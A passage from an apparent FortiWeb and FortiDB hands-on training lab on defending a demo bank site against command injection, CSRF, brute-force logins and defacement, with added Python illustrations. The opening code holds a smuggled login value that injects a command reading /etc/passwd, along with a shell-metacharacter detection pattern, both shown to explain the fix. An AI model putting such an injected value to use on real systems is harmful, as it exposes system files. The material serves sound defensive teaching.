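    """Fix 2: if a command is unavoidable, quote the value so it stays one argument."""
    return shlex.split("echo " + shlex.quote(login))


# WAF-side check the lab switched off: shell metacharacters have no business in a login name.
SHELL_META = re.compile(r"[;&|`$<>\n]")


def param_has_shell_meta(value):
    return bool(SHELL_META.search(value))


if __name__ == "__main__":
    cmd = build_vulnerable_command(LOGIN)
    print(cmd)
    print(shell_commands(cmd))     # three commands; the second one reads /etc/passwd
    print(quoted_argv(LOGIN))      # ['echo', 'myuser; cat /etc/passwd > salida.txt ; echo ']
    print(param_has_shell_meta(LOGIN), param_has_shell_meta("myuser"))  # True False
```

Quoting makes the whole login value a single argument to echo, so the ';' and '>' are data, not syntax; writing the log file directly removes the shell, and with it the problem, entirely. The metacharacter check is the parameter validation rule that step 1 of this lab disabled.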

Preventing Cross-Site Request Forgery (CSRF)

Preventing Cross-Site Request Forgery (CSRF) Discussion

Cross-Site Request Forgery (CSRF) Review


Malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts
Unlike cross-site scripting (XSS), which exploits the trust a user has in a particular site, CSRF exploits the trust that a site has in a user's browser
OWASP Reference: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

Cross-Site Request Forgery (CSRF) Simplified Steps


1. Alice logs in to www.xbank.com in order to pay her bills
2. www.xbank.com authenticates Alice and stores a cookie named XBANK_AUTH in Alice's browser
3. Alice logs out of the bank site and starts browsing a blog
4. Trudy posts an entry in the blog with an image whose URL actually executes a withdrawal on www.xbank.com
5. When Alice's browser loads the image, the request goes to www.xbank.com carrying the XBANK_AUTH cookie; since the cookie is still valid, www.xbank.com trusts the request and allows the withdrawal
6. Alice now has less money in her account

CSRF Attacking www.xbank.com > Check balance Open your browser and go to www.xbank.com

Login to site and go to the account listing page


Check your savings accounts balance

CSRF Attacking www.xbank.com > run attack
Find the file csrf_page.html in the resources provided and double-click it

CSRF Attacking www.xbank.com > See balance delta Check your balance again

Any change?

CSRF Attacking www.xbank.com (2)
7. Let's take a look at csrf_page.html

Prevent CSRF Applying business logic
One way of preventing CSRF is forcing the session to follow the application logic. For instance, to perform a withdrawal on www.xbank.com you must first go through:
1. verify_admin.php
2. do_transaction.php
3. save_transaction.php

The Page Access Rule feature enforces this business logic by tracking the session with a cookie, FORTIWAFSID

Prevent CSRF Applying business logic (2)

1. Go to Page Access Rule
2. Create New

Notice the warning: Session Management must be enabled

Prevent CSRF Applying business logic (3)


1. Name the policy: page_access1
2. Click OK to save
3. Click Create New to create a new rule
4. Enable Host Status
5. Select the Host from the dropdown
6. Specify Match Type: RegEx
7. Add the URL pattern
8. Click OK to save
9. Repeat for the additional URLs

Prevent CSRF Applying business logic (3)

Final Results of CSRF Rules Page

Prevent CSRF Applying business logic (4) 1. Edit xbank_web_protection

2. Enable Session Management


3. Select the recently created page access rule
NOTE: to enforce business logic, FortiWeb must be session aware, which is why enabling session management is mandatory.

Prevent CSRF Applying business logic (5)

Verify Session Management is enabled

Select new Page Access Rule

Prevent CSRF Testing Configuration > Check Balance
1. Log back into www.xbank.com
2. Stay at the account listing page and review the balance

Prevent CSRF Testing Configuration > Rerun attack
1. Log back into www.xbank.com
2. Stay at the account listing page and review the balance
3. Open your browser's cookie viewer and search for the cookie FORTIWAFSID
4. Double-click csrf_page.html

Prevent CSRF Testing Configuration > Verify No change
Review your balance. Any change?

Prevent CSRF Testing Configuration > Check Attack Logs
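The page access rule as a per-session state machine keyed on the WAF session cookie, added here as an example and not FortiWeb code. The page order is the one from this lab; the session IDs, the /accounts.php name for the account listing page and the request trace are constructed.

```python
# Added example, not FortiWeb code: a page access rule as a per-session state
# machine keyed on the FORTIWAFSID cookie. ORDER is the lab's; session IDs,
# /accounts.php and the trace are constructed.
ORDER = ["/verify_admin.php", "/do_transaction.php", "/save_transaction.php"]


class PageAccessEnforcer:
    def __init__(self, order):
        self.order = order
        self.progress = {}   # FORTIWAFSID -> index of the furthest ordered page reached

    def check(self, session_id, path):
        """'allow' or 'deny'. Pages outside the rule are always allowed; a page in
        the rule is allowed only if the previous page in the order was reached in
        this session (re-visiting an earlier page is fine)."""
        if path not in self.order:
            return "allow"
        idx = self.order.index(path)
        reached = self.progress.get(session_id, -1)
        if idx <= reached + 1:
            self.progress[session_id] = max(reached, idx)
            return "allow"
        return "deny"


TRACE = [   # constructed: (FORTIWAFSID, request path)
    ("sid-alice", "/index.php?p=login.html"),
    ("sid-alice", "/verify_admin.php"),        # login
    ("sid-alice", "/accounts.php"),            # account listing (hypothetical name)
    ("sid-alice", "/save_transaction.php"),    # forged by csrf_page.html: skips do_transaction.php
    ("sid-alice", "/do_transaction.php"),      # Alice's own transfer, in order
    ("sid-alice", "/save_transaction.php"),
    ("sid-trudy", "/do_transaction.php"),      # a session that never went through the login page
]


def simulate(trace=TRACE):
    enforcer = PageAccessEnforcer(ORDER)
    return [enforcer.check(sid, path.split("?", 1)[0]) for sid, path in trace]


if __name__ == "__main__":
    for (sid, path), verdict in zip(TRACE, simulate()):
        print(f"{sid:10} {path:28} {verdict}")
```

The forged request is denied because, in Alice's WAF session, do_transaction.php was never reached before save_transaction.php. Note the limit of this control: the browser sends the FORTIWAFSID cookie with cross-site requests too, so a forged page that walks the whole sequence in order would pass. Page ordering raises the bar; per-request anti-CSRF tokens and SameSite cookies in the application are the standard fix.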

Brute Force Attacks

Brute Force Attacks Discussion

Brute Force Attacks
Login names and passwords always present a challenge in application security
Weak passwords are one of the most common attack vectors used to gain access to an application
Dictionary and brute force login attacks consist of trying to guess a valid username and password combination
FortiWeb can prevent these attacks using statistical thresholds (similar to DoS sensors in FortiGate)

Configuring Brute Force Login Rule > Create New

1. Go to Brute Force Login
2. Create New

Notice the warning: Share IP must be enabled

What is Enable Share IP


Some source IP addresses represent a single computer, but others represent 100 or 1000 computers
Caused by source hide NAT

Some FortiWeb policies apply access rate limits
A rate limit applied to 1 computer should be smaller than a rate limit applied to 500 computers, hence 2 configuration values

How does FortiWeb determine that multiple connections originate from more than 1 computer?
Instead of only counting hits by source IP, it counts hits by source IP + the ID field in the IP header (non-contiguous ID numbers indicate several hosts behind the same address)

Configuring Brute Force Login Rule > Create New (2)

1. Name the rule
2. Click OK to save
3. Create New
4. Select Host Status
5. Select Host
6. Specify the target page
7. Set Block Time (seconds)
8. Click OK to save

Note: the page that should be monitored is verify_admin.php, but we are using login.html because it is easier to test with.

Configuring Brute Force Login Rule > Enable Share IP

1. Navigate to Share IP
2. Select Enable Share IP
3. Click Apply to save

Configuring Brute Force Login Rule > Enable Policy

1. Edit Inline Protection Profile xbank_web_protection

2. Select Brute Force Login

Configuring Brute Force Login Rule (3)
Apply the Brute Force Login rule to xbank_web_protection
Access http://www.xbank.com/login.html
Refresh your browser as fast as you can (F5, Command + R, etc.) until you get banned for 10 seconds

Configuring Brute Force Login Rule > Review Attack Log
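A brute-force login sensor of the kind just configured, added as an example rather than FortiWeb code. It is the same mechanism as the HTTP Access Limit DoS policy described earlier (a request counter per source within a time window, then a block period), plus the Share IP heuristic from the previous slides. The thresholds, window, block time, addresses and IP-ID sequences are assumptions; how FortiWeb scores the IP-ID field internally is not documented on these slides.

```python
from collections import defaultdict, deque

# Added example, not FortiWeb code. Thresholds, window and the Share IP
# heuristic are assumptions made to illustrate the rule.


class BruteForceSensor:
    def __init__(self, page, limit_single=10, limit_shared=100, window=1.0, block_time=10.0):
        self.page, self.window, self.block_time = page, window, block_time
        self.limit = {"single": limit_single, "shared": limit_shared}
        self.hits = defaultdict(deque)                      # src_ip -> hit timestamps in the window
        self.ip_ids = defaultdict(lambda: deque(maxlen=8))  # src_ip -> last IP-ID values seen
        self.blocked_until = {}                             # src_ip -> end of the block period

    def is_shared(self, src_ip):
        """Share IP heuristic: one host's IP-ID field counts up in small steps;
        a NAT pool's values jump around because several stacks are interleaved."""
        ids = list(self.ip_ids[src_ip])
        if len(ids) < 4:
            return False
        jumps = sum(1 for a, b in zip(ids, ids[1:]) if not 0 < b - a <= 16)
        return jumps * 2 >= len(ids) - 1

    def observe(self, now, src_ip, ip_id, path):
        """Feed one request; returns 'allow' or 'block'."""
        self.ip_ids[src_ip].append(ip_id)
        if now < self.blocked_until.get(src_ip, 0.0):
            return "block"                                  # banned: every page, until block_time expires
        if path != self.page:
            return "allow"
        window_hits = self.hits[src_ip]
        window_hits.append(now)
        while window_hits and now - window_hits[0] > self.window:
            window_hits.popleft()
        limit = self.limit["shared" if self.is_shared(src_ip) else "single"]
        if len(window_hits) > limit:
            self.blocked_until[src_ip] = now + self.block_time
            window_hits.clear()
            return "block"
        return "allow"


if __name__ == "__main__":
    sensor = BruteForceSensor("/login.html")
    # constructed traffic: one host hammering login.html 20 times per second
    for i in range(12):
        print(i, sensor.observe(i * 0.05, "10.0.0.5", 1000 + i, "/login.html"))
```

With the single-host limit a twelfth request in the same second is blocked and the address stays blocked for block_time seconds on every page; behind a NAT address the IP-ID jumps trigger the higher shared limit, so the same rate from many users is not punished. The heuristic is only as good as the IP-ID behaviour of the hosts involved, which is why Share IP is a separately enabled setting.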

Auto-Learning

FortiWeb Learning Mode

FortiWeb Deployment Auto-Learning
Any WAF deployment requires some knowledge of the application, which adds complexity to the deployment
Auto-Learning is a mode that helps during the deployment phase by creating a baseline from the observed behavior

Configuring Auto-Learning
1. Go to Auto Learn > Auto Learn Profile > Default Auto Learn Profile and create a new inline profile named xbank-auto
2. Go to Server Policy > Policy, edit xbank_web_policy and assign:
Web Protection Profile: Inline Alert Only
WAF Auto Learn Profile: xbank-autoXXXXXX

Configuring Auto-Learning > Create a new Profile

1. Go to Auto Learn -> Auto Learn Profile -> Auto Learn Profile
2. Select Create New

Configuring Auto-Learning > Create a new Profile (2)

1. Name Profile

2. Specify Profile Settings

3. Click OK to save

Configuring Auto-Learning > Check Session Management

1. Go to Inline Protection Profile
2. Edit xbank_web_protection
3. Make sure Session Management is enabled

Configuring Auto-Learning > Apply new Auto Learn Profile

1. Go to Server Policy
2. Edit xbank_web_policy
3. Select the Auto Learn Profile
4. Enable Monitoring Mode

Configuring Auto-Learning > Test WAF Auto Learn Profile
1. Access the XBANK site and navigate through it: try to access every page, make transfers, update the profile, etc.
2. Go to Auto Learn > Auto Learn Report on the FortiWeb
3. Review the report automatically generated by the auto-learn feature
4. Download the report as PDF and review it
5. Note that it is possible to edit and adjust some of the results
6. Generate a configuration based on the Auto-Learn report

Configuring Auto-Learning > Auto Learn Report

1. Generate Config
2. Name the profile
3. Click OK to save

Configuring Auto-Learning > Review generated configuration Pay special attention to the Parameters Validation rules
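What the auto-learn baseline described on the feature slide (URLs, methods, parameters, length and type, required or optional) computes, and how it turns into the parameter validation rules you are asked to review, as an added example and not FortiWeb's learning engine. The request lines are constructed sample traffic for the XBANK pages; the parameter names on do_transaction.php, the type classes and the rule shape are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Added example, not FortiWeb's auto-learn engine. Constructed sample traffic,
# one request per line as "METHOD path[?query] [form body]".
SAMPLE_REQUESTS = [
    "GET /index.php?p=login.html",
    "GET /index.php?p=login.html",
    "POST /verify_admin.php txtUser=jdoe&txtPassword=s3cret1",
    "POST /verify_admin.php txtUser=asmith&txtPassword=Pa55word",
    "POST /verify_admin.php txtUser=bob&txtPassword=hunter2",
    "POST /do_transaction.php account=1002&amount=150.00",
    "POST /do_transaction.php account=1003&amount=20.50",
    "POST /do_transaction.php account=1002&amount=1000.00&memo=rent",
]

TYPES = [   # most specific first; the first class matching every observed value wins
    ("digits",   r"^[0-9]+$"),
    ("decimal",  r"^[0-9]+\.[0-9]+$"),
    ("alpha",    r"^[A-Za-z]+$"),
    ("alnum",    r"^[A-Za-z0-9]+$"),
    ("filename", r"^[A-Za-z0-9_.-]+$"),
    ("any",      r"^.*$"),
]


def parse_request(line):
    parts = line.split(" ", 2)
    method, target = parts[0], parts[1]
    path, _, query = target.partition("?")
    body = parts[2] if len(parts) == 3 else ""
    params = parse_qs(query, keep_blank_values=True)
    for name, values in parse_qs(body, keep_blank_values=True).items():
        params.setdefault(name, []).extend(values)
    return method, path, params


def learn(requests):
    """Baseline: (method, url) -> parameter -> hits, required, min/max/avg length, type."""
    hits = defaultdict(int)
    seen = defaultdict(lambda: defaultdict(list))
    for line in requests:
        method, path, params = parse_request(line)
        hits[(method, path)] += 1
        for name, values in params.items():
            seen[(method, path)][name].extend(values)
    baseline = {}
    for key, params in seen.items():
        baseline[key] = {}
        for name, values in params.items():
            lengths = [len(v) for v in values]
            type_name = next(t for t, rx in TYPES if all(re.match(rx, v) for v in values))
            baseline[key][name] = {
                "hits": len(values), "required": len(values) >= hits[key],
                "min": min(lengths), "max": max(lengths),
                "avg": round(sum(lengths) / len(lengths), 1), "type": type_name,
            }
    return baseline


def suggest_rules(baseline):
    """Baseline -> parameter validation rules (method, url, param, required, max_len, regex)."""
    regex_for = dict(TYPES)
    rules = []
    for (method, path), params in sorted(baseline.items()):
        for name, stats in sorted(params.items()):
            rules.append((method, path, name, stats["required"], stats["max"], regex_for[stats["type"]]))
    return rules


if __name__ == "__main__":
    for rule in suggest_rules(learn(SAMPLE_REQUESTS)):
        print(rule)
```

This is why the generated configuration needs a review before it is enforced: eight requests are not enough traffic, so the learned maximum of 8 for txtPassword would block the first user with a 9-character password, and memo is marked optional only because it appeared in one request. Adjust the lengths and the required flags in the report, then generate the configuration.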

Web Defacement

Anti-Defacement Tool

Web Defacement A website defacement is an attack on a website that changes the visual appearance of the site or a webpage

FortiWeb Anti-Defacement Tool
FortiWeb has an anti-defacement tool that recognizes when a web site file has been changed and reacts accordingly:
1. Backs up each site object and computes a hash for it
2. Monitors each object, comparing its hash with the registered one
3. If any change is detected:
Alert and recover the changed file manually
Automatically recover the changed file

Configure Anti-Defacement Tool

1. Go to Web Anti-Defacement
2. Create New

Configure Anti-Defacement Tool > Create Policy

Go to Web Site with Anti-Defacement and create a new policy:
Name the policy
Enable Monitoring
Define the folder to monitor
Specify the credentials used for monitoring
Set the monitor intervals
Enable Auto Restore
Click OK to save
Test Connection

Configure Anti-Defacement Tool > Review
After a while you should see a connected status and the number of files that were backed up

Configure Anti-Defacement Tool > Review (2) Inspect the policy details and statistics

Configure Anti-Defacement Tool > Review (3)
Inspect the list of protected files and their attributes

Configure Anti-Defacement Tool > Review (4)


1. Edit the login.html file and change something in its content
2. Wait until one file is reported as changed
3. Inspect the changes by clicking on the Total Changed Files number
4. Access the XBANK site and you will see the defaced site

Configure Anti-Defacement Tool > Review (5)
Review the log file and verify the defacement event
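The backup, hash, compare and restore cycle the anti-defacement tool performs, written out as an added example (not FortiWeb code) so the detection logic is visible. demo() replays this lab in a temporary directory: the site content, file names other than login.html and the defacement text are constructed; the real tool reads the site over the credentials configured in the policy rather than from a local path.

```python
import hashlib
import os
import shutil
import tempfile

# Added example, not FortiWeb code: hash-based change detection with a backup
# copy and auto-restore, on a local directory standing in for the web root.


def sha256_file(path):
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def snapshot(root):
    """relative path -> sha256 for every file under root (the 'registered' hashes)."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            result[os.path.relpath(full, root)] = sha256_file(full)
    return result


def take_backup(root, store):
    """Copy the site into the backup store and register the hashes as baseline."""
    shutil.copytree(root, store)
    return snapshot(root)


def check(root, baseline):
    """Compare the live site with the baseline: returns (changed, deleted, added)."""
    current = snapshot(root)
    changed = sorted(p for p in baseline if p in current and current[p] != baseline[p])
    deleted = sorted(p for p in baseline if p not in current)
    added = sorted(p for p in current if p not in baseline)
    return changed, deleted, added


def restore(root, store, paths):
    """Auto Restore: put the backed-up copy of each changed file back in place."""
    for rel in paths:
        shutil.copy2(os.path.join(store, rel), os.path.join(root, rel))


def demo():
    """Replay the lab: back up, deface login.html, detect, auto-restore, re-check."""
    work = tempfile.mkdtemp()
    site, store = os.path.join(work, "xbank"), os.path.join(work, "backup")
    os.makedirs(site)
    with open(os.path.join(site, "login.html"), "w") as f:
        f.write("<h1>XBANK login</h1>\n")              # constructed content
    with open(os.path.join(site, "index.php"), "w") as f:
        f.write("<?php /* constructed placeholder */ ?>\n")
    baseline = take_backup(site, store)
    with open(os.path.join(site, "login.html"), "w") as f:
        f.write("<h1>Hacked by Trudy</h1>\n")          # the defacement
    changed, deleted, added = check(site, baseline)
    restore(site, store, changed)
    after = check(site, baseline)
    shutil.rmtree(work)
    return {"detected": changed, "after_restore": after}


if __name__ == "__main__":
    print(demo())   # {'detected': ['login.html'], 'after_restore': ([], [], [])}
```

Two points worth carrying over to the real deployment: hashes, not timestamps, decide whether a file changed, so touching a file back to its old mtime does not hide an edit; and the added-files list matters as much as the changed list, because a dropped web shell is a new file, not a modified one. The baseline and the backup copy live on the FortiWeb, off the server an attacker has just written to.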

FortiWeb Basic Troubleshooting

Get System Status


# get system status

Get System Performance


# get system performance

Get System Global


# get system global

System Top
# diag system top
Shows each process, its process ID, state, CPU consumption and memory consumption. Key presses re-sort the list by processor or memory consumption.

# diag system kill <process_id>

System Flash List


# diag system flash list
Shows the flash partitions and the firmware version installed on each. This matters when upgrading the unit: if an upgrade does not go well, you can roll back to the previous version that the unit kept on the other partition.

Execute Options
# execute ?

Traceroute also uses the source address set with ping-options. When a FortiGate or FortiWeb is registered, to avoid waiting for the FortiGuard update cycle use: exec update-av, exec update-ips, exec update-now. Resetting the log disk requires a reboot.

Execute Ping
# execute ping

Execute Traceroute
# execute traceroute

FortiWeb Advanced Troubleshooting

Diagnose Commands

CLI command trees: diagnose, get
Commonly used sub-branches:
diag network sniffer
diag system
diag debug application
get log
get sys

Numerous options/parameters, viewed with ?

Diagnose Debug Flow


# diagnose debug flow filter clear
# diagnose debug flow filter client-ip <source_ipv4>
# diagnose debug flow filter direction {both | client-to-server | server-to-client}
# diagnose debug flow filter server-ip <destination_ipv4>
# diagnose debug flow filter server-ip 2.2.128 (physical/real server IP)
# diagnose debug flow show module-process-detail on
# diagnose debug flow trace start
# diagnose debug enable

Diagnose Debug Flow


We must see:

Crash Log
# diagnose debug crashlog read

Use this command to show crash logs from application proxies that have call back traces, segmentation faults, or memory register dumps, or to delete the crash log.

Diagnose Debug Application


# diagnose debug application autolearn [{-1 | 0}]

Use this command to set the verbosity level of debug logs for autolearning.

Diagnose Debug Application


# diagnose debug application dssl [{-1 | 0}]

Use this command to set the verbosity level of debug logs for SSL inspection (temporary decryption in order to enforce policies). SSL inspection is used only when FortiWeb is operating in a mode that supports it, such as true transparent mode, transparent inspection mode, or offline protection mode.

Diagnose Debug Application


# diagnose debug application ssl [{-1 | 0}]

Use this command to set the verbosity level of debug logging for SSL/TLS offloading. SSL offloading is supported only when the FortiWeb appliance is operating in reverse proxy mode or true transparent proxy mode.

Diagnose Debug Application


# diagnose debug application http [{-1 | 0}]

Use this command to set the verbosity level of debug logs for the HTTP protocol parser. This parser module dissects the HTTP headers and content body for analysis by other modules such as rewriting, HTTP protocol constraints, server information disclosure, and attack signature matching.

Diagnose Network
# diagnose network tcp list

Use this command to view a list of TCP raw socket details

Diagnose Network
# diagnose network arp add <interface_name> <interface_ipv4> <mac-address_hex> # diagnose network arp delete <interface_name> <interface_ipv4> <mac-address_hex> # diagnose network arp list

Use this command to add or delete an address resolution protocol (ARP) in the internal ARP table, or to display the ARP table.

Diagnose Policy
# diagnose policy dashboard {all | list <policy_name>} # diagnose policy memory show <policy_name> # diagnose policy pserver list <policy_name> # diagnose policy session {count <policy_name> | list <policy_name>} # diagnose policy traffic show <policy_name>

Use this command to view the process ID, memory usage, live sessions, and traffic statistics associated with a server policy.

Introduction to FortiDB

Introducing FortiDB

Configuration and Vulnerability Management


Best-in-breed extensive policy driven static controls

Policy driven Controls

XL Automated process of establishing IT internal controls

DAM Database Activity Monitoring


Real-time monitoring of key users and critical transactions

Database Audit and Compliance


For Compliance and Forensic Analysis purposes

Full complement of Database Controls

Highly Scalable from SMB to Enterprise

Key Compliance Solution

FortiGuard Subscription Services


Real-Time Security Protection
Global software updates
Large security knowledgebase
FortiDB Security Service subscription
Hundreds of database-specific signatures

Global Distributed Network


100+ threat research professionals
Eight global locations
Automated updates to Fortinet customers

Robust 24 x 7 x 365 Real-Time Global Intelligence

Multiple Data Collection Methods


Network sniffer
No impact on the server
Zero network latency
Transparent to the infrastructure

Native Audit
Selective audit, only 3-4% performance impact
Does not require agents
Captures 100% of events

Network Agents
2-3% performance impact on the server (not the DB)
Agents send information back to FortiDB appliances

FortiDB Family
FortiDB-400C
Targets SMB market with up to 10 Database servers

Small, Mid-Enterprise Deployments


Up to 10 DBs support
HDD - 1x500GB, 1TB optional
4 x 10/100/1000 copper RJ45

FortiDB-1000C
Scalable solution for up to 60 database servers

Mid-Large Enterprise Deployments


Up to 30 DBs support
HDD 1TB, 2 TB optional RAID1
4 x 10/100/1000 copper RJ45

Up to 60 DBs support
HDD - 1TB, 2TB optional RAID1
Hot-swap redundant AC-Power
4 x 10/100/1000 copper RJ45

FortiDB-2000B
Enterprise deployment with redundant AC-power and support for up to 60 database servers

Large Enterprise/ Service Provider Deployments

FortiDB Software

Large Enterprise/ Service Provider Deployments


Per server CPU licensing model
Windows, Linux and Solaris server OS support

For enterprise deployments with hundreds of database servers

Efficient Deployment and Management


No requirement to change network infrastructure
Designed from day one for non-intrusive deployment
FortiDB

Intuitive GUI with Centralized Policy Management


Allows for both rapid and accurate implementations

Database Servers

A single server can handle hundreds of databases


Does not require deploying multiple servers

Same solution can monitor local and geographically remote databases


No need for per data center appliance

Support for both agent based, and agent less deployment with an additional sniffer-mode option
Providing a solution for every architecture

Suited to Cloud Environments


Can monitor all databases, even in virtualized environments

FortiDB - Discovery/ Assessment


Auto Discovery of databases
Sensitive data discovery
Built in policies
Custom policies

Out of the box VA Policies
Policy updates through FortiGuard Services
Mapping to CIS, PCI benchmarks
Risk levels
Remediation advice
Pentest module
FortiDB

FortiDB Privilege Review


What privileges and roles does each user have?
Specific to each Database type
Users, roles and corresponding Objects/privileges

Critical in establishing a minimal privilege setting scheme
Can be exported into reports

FortiDB

User Activity Profiling: Why is it needed?


Environments consist of:
Databases
Many applications
A lot of users
Thousands of tables and objects

The environment constantly changes, with different elements being added/changed:


Queries, tables, stored procedures, etc.
Source IPs/Apps

Admins usually do not understand how all these elements work together:
Which user accesses which database
What tables users access regularly
Where users come from and what tools they use (IP, source application, etc.)
What is normal behavior and what is suspicious

A profile/baseline must be created automatically, with constant updates, in order to understand the environment. Once the baseline is established it is easy to detect suspicious behavior.

Control/ Policy Configuration


Automated policy configuration and management across the enterprise
Out of the box policies
DDL, DCL
Privileged users/access monitoring policies
Audit policies for more efficient auditing
Pre-defined policies for Compliance
Asset based model
Hierarchical configuration allows grouping policies and databases
Custom policies for data access

FortiDB

Database Activity Monitoring Alert Policies


Alert on Suspicious Activities
Pre-defined policies
DCLs, DDLs
User Configurable policies
DMLs, Select on objects
Privileged Users
Sessions, Users
Alerts on specific conditions (can black/white list Source IP, OS Host, Source App, etc.)
Pre-Defined policy groups for easy configuration

Alerts Summary/Analysis
Alerts Summary
Displays alerts trends
Timeframes are 7, 30, 90 days and 12 months
Important for understanding trends
Alerts Analysis
Primary focus is more detailed analysis
Grouped by: Severity, Policy, database Action, and different client information
More granular view of trends

Reporting/ Compliance
Automated Compliance reports
Reports with detailed drilldowns
Integration with ArcSight
Archive

Automation of Auditing and Compliance


Automated report generation based on COBIT:
Abnormal Use of Service Accounts
Abnormal or Unauthorized Changes to Data
Abnormal Termination of Database Activity
History of Privilege Changes Report
Verification of Audit Settings
End of Period Adjustments

FortiDB Summary
Multiple Data Collection methods
Sniffer
Native Audit
Agents
Out of the box policies for privileged users and object/schema design changes
User, session and data policies allowing audit of every request
Real time alerts
Pre-defined audit policies
Pre-defined Compliance Reports
Roles and Privileges reports
Identifies vulnerabilities and provides remediation advice
Verifies configuration
Built in best practices
User Activity Profiling

Auditing and Monitoring


Vulnerability Assessment

FortiDB Value Add


Secures confidential data in databases and applications
Reporting

Database Activity Monitoring


Policy driven configuration
Data collection
Real time alerts

Database Compliance
Compliance policies
Compliance reports

Sensitive data discovery in databases
Database Activity Monitoring with real-time alerts
Vulnerability scanning with remediation advice
User Activity Profiling for Baselining

Easily deploys in any environment


FortiClient Desktop
Vulnerability Assessment
Vulnerability scan
Sensitive data discovery
Privilege review

Multiple data collection options
Flexible policy driven configuration

Helps achieve compliance


Out of the box audit & compliance policies

Canned compliance reports

Hands On How to PoC FortiDB

Vulnerability Assessment & Management

Database Vulnerability Assessment & Management

Database Vulnerability Assessment > Create Assessment

1. Go to Assessments
2. Add

Database Vulnerability Assessment > Create Assessment

Create a new Database Assessment

Database Vulnerability Assessment > Select Target
Define a Database Target

Database Vulnerability Assessment > Select Tests
Select Assessment Tests (Policies)

Save

Database Vulnerability Assessment > Run Assessment
Select (Check Box) & Run Assessment

Database Vulnerability Assessment > Review Results
Select the Results tab and click on the Assessment Start Time to view the summary results for each target

Database Vulnerability Assessment > View Detailed Report
Select the Target name to view the Vulnerability Assessment Detailed Report

Database Vulnerability Assessment > Report Details

Sensitive Data Discovery

Sensitive Data Discovery

Sensitive Data Discovery is a feature introduced in FortiDB 4.2

Sensitive Data Discovery allows you to:


Scan a database and try to find any information that could be compromising
Works similarly to Database Vulnerability Assessment

Configuring Sensitive Data Discovery > Create New Policy
Navigate to Policy > Data Discovery Policies
Click Add to create a new Data Discovery Policy

Configuring Sensitive Data Discovery > CCN Policy


Create a Data Discovery Policy that will search for XBANK credit card numbers
Name: XBANK_CARDS
Data Pattern: (([0-9]{4}-){3})[0-9]{4}
Will match four groups of four numbers, each group separated by a dash (XXXX-XXXX-XXXX-XXXX)
Search in actual data

Configuring Sensitive Data Discovery > PWD Policy


Create a Data Discovery Policy that will search for password columns in the XBANK DB:
Name: XBANK_PASSWORDS
Column Name: .*pass.*
Will match any column name containing the phrase pass inside: codepass, password, pass, passcode, etc.
Search in metadata (column name)
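The two policies above can be exercised outside the appliance with any regular-expression engine. The following Python script is an added example and not FortiDB code: it applies the XBANK_CARDS data pattern to constructed sample values and the XBANK_PASSWORDS column-name pattern to constructed column metadata (the sample schema, and every table and column name other than xbank_customer, is made up for the example). It also shows one caveat of the lab pattern: a card number stored without dashes is not matched, so a data pattern is needed for every storage format actually in use.

```python
import re

# Added example, not FortiDB code: reproduces the matching behaviour of the two
# Data Discovery policies from the lab against constructed sample data.

# XBANK_CARDS: four groups of four digits separated by dashes (searches actual data)
CARD_PATTERN = re.compile(r"(([0-9]{4}-){3})[0-9]{4}")

# XBANK_PASSWORDS: any column whose name contains "pass" (searches metadata)
PASSWORD_COLUMN_PATTERN = re.compile(r".*pass.*", re.IGNORECASE)

# Constructed sample schema for the example: table -> {column: [values]}
SAMPLE_DB = {
    "xbank_customer": {
        "customer_login": ["john", "anna"],
        "customer_password": ["abc1234", "hunter2"],
        "customer_email": ["john@example.invalid", "anna@example.invalid"],
    },
    "xbank_payment": {
        "payment_id": ["1", "2"],
        "card_number": ["1234-5678-9012-3456", "4111111111111111"],  # second one has no dashes
        "note": ["paid with 9999-8888-7777-6666 on file", "cash"],  # PAN embedded in free text
        "passcode": ["0000", "1234"],
    },
}


def find_sensitive_columns(db, pattern=PASSWORD_COLUMN_PATTERN):
    """Metadata search: return (table, column) pairs whose column name matches."""
    hits = []
    for table, columns in db.items():
        for column in columns:
            if pattern.fullmatch(column):  # .*pass.* is written to cover the whole name
                hits.append((table, column))
    return sorted(hits)


def find_sensitive_values(db, pattern=CARD_PATTERN):
    """Data search: return (table, column, row_index) for every value containing a match."""
    hits = []
    for table, columns in db.items():
        for column, values in columns.items():
            for index, value in enumerate(values):
                # search(), not fullmatch(): a card number may be embedded in longer text
                if pattern.search(value):
                    hits.append((table, column, index))
    return sorted(hits)


if __name__ == "__main__":
    print("columns:", find_sensitive_columns(SAMPLE_DB))
    print("values:", find_sensitive_values(SAMPLE_DB))
```

The metadata pass flags customer_password and passcode; the data pass flags the dashed card number and the one buried in the note column, but not the undashed 4111111111111111, which is the gap a second data pattern (or a digit-only pattern with a Luhn check) would have to cover.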

Configuring Sensitive Data Discovery (4)


Create a new Data Discovery Policy Group that contains both previously created Data Discovery Policies

Configuring Sensitive Data Discovery > Select Target
Navigate to Vulnerability Assessment > Sensitive Data Discovery
Select Target Name = xbankapp_db to select details and apply the Policy Group

Configuring Sensitive Data Discovery > Select DB Meta
Select Target Details (Databases, Tables, Columns)

Configuring Sensitive Data Discovery > Select Policy Group

Navigate to Policy Group, select xbank_group1 and Save

Configuring Sensitive Data Discovery > Run Discovery
Run Data Discovery
Select Target xbankapp_db and Start Scan
Observe progress under the Last Discovery column

Configuring Sensitive Data Discovery > Discovery Results
After starting the Data Discovery, observe the results under the Last Discovery column
Click the results link to view the Detailed Report

Configuring Sensitive Data Discovery > Preview Report
Preview Report Details

Configuring Sensitive Data Discovery

1. Go to Data Discovery Policies

2. Add


Configuring Sensitive Data Discovery (4)


Create a Data Discovery Policy Group that contains both previously created policies

1. Go to Data Discovery Policy Groups

2. Add

Configuring Sensitive Data Discovery (5)

1. Go to Sensitive Data Discovery
2. Click on xbankapp_db

Configuring Sensitive Data Discovery (6)

1. Highlight database

2. Highlight tables to scan and use the arrow to mark them as selected

Configuring Sensitive Data Discovery (7)

1. Select created Data Discovery Policy Group

Configuring Sensitive Data Discovery (8)

1. Once the Sensitive Data Discovery is configured you can run it and wait until the scan finishes
2. After that, review the results and see if it found something

DAM Policies

Creating Custom DAM Policies

1. Go to Policies > DAM Policies

2. Add a new Table Policy that generates an event when someone other than dbo reads or writes the dbo.spt_values table
3. Create a custom DAM Policy Group and add the created policy as a member
4. Assign the new Policy Group to the MSSQL monitor
